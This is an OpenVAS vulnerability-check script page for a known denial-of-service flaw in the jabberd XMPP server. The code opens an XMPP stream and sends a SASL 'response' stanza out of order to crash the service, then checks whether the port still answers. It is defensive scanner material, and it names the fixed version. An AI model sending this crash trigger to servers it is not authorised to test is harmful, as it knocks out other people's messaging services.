Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310802825
HistoryApr 02, 2012 - 12:00 a.m.

Jabber Studio Jabberd Server SASL Negotiation DoS Vulnerability

2012-04-0200:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
6

9.2 High

AI Score

Confidence

High

0.066 Low

EPSS

Percentile

93.8%

Jabberd server is prone to a denial of service (DoS) vulnerability.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802825");
  script_version("2023-07-21T05:05:22+0000");
  script_cve_id("CVE-2006-1329");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2012-04-02 13:27:16 +0530 (Mon, 02 Apr 2012)");
  script_name("Jabber Studio Jabberd Server SASL Negotiation DoS Vulnerability");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Denial of Service");
  script_dependencies("xmpp_detect.nasl");
  script_require_ports("Services/xmpp-server", 5347);
  script_mandatory_keys("xmpp/installed");

  script_xref(name:"URL", value:"http://secunia.com/advisories/19281");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/17155");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/25334");
  script_xref(name:"URL", value:"http://article.gmane.org/gmane.network.jabber.admin/27372");

  script_tag(name:"impact", value:"Successful exploitation may allow remote attackers to cause the
  application to crash, creating a denial-of-service condition.");

  script_tag(name:"affected", value:"Jabber Studio jabberd Server version before 2.0s11.");

  script_tag(name:"insight", value:"The flaw is caused due to an error within the handling of SASL
  negotiation. This can be exploited to cause a crash by sending a 'response' stanza before an
  'auth' stanza.");

  script_tag(name:"solution", value:"Update to version 2.0s11 or later.");

  script_tag(name:"summary", value:"Jabberd server is prone to a denial of service (DoS) vulnerability.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("port_service_func.inc");

port = service_get_port(default:5347, proto:"xmpp-server");

if(!soc = open_sock_tcp(port))
  exit(0);

req1 = string('<?xml version="1.0"?>\n',
              '<stream:stream to="xyz.com"\n',
              'xmlns="jabber:client"\n',
              'xmlns:stream="http://etherx.jabber.org/streams"\n',
              'xml:lang="en" version="1.0">\n');

send(socket:soc, data:req1);
resp = recv(socket:soc, length:1024);

if(resp && "jabber.org" >< resp && "xmpp-sasl" >< resp) {
  # nb: A SASL'response' req
  req2 = "<response xmlns='urn:ietf:params:xml:ns:xmpp-sasl'> **** </response>";
  send(socket:soc, data:req2);
  resp = recv(socket:soc, length:1024);
}
close(soc);

soc2 = open_sock_tcp(port);
if(!soc2) {
  security_message(port:port);
  exit(0);
}

close(soc2);

exit(0);

9.2 High

AI Score

Confidence

High

0.066 Low

EPSS

Percentile

93.8%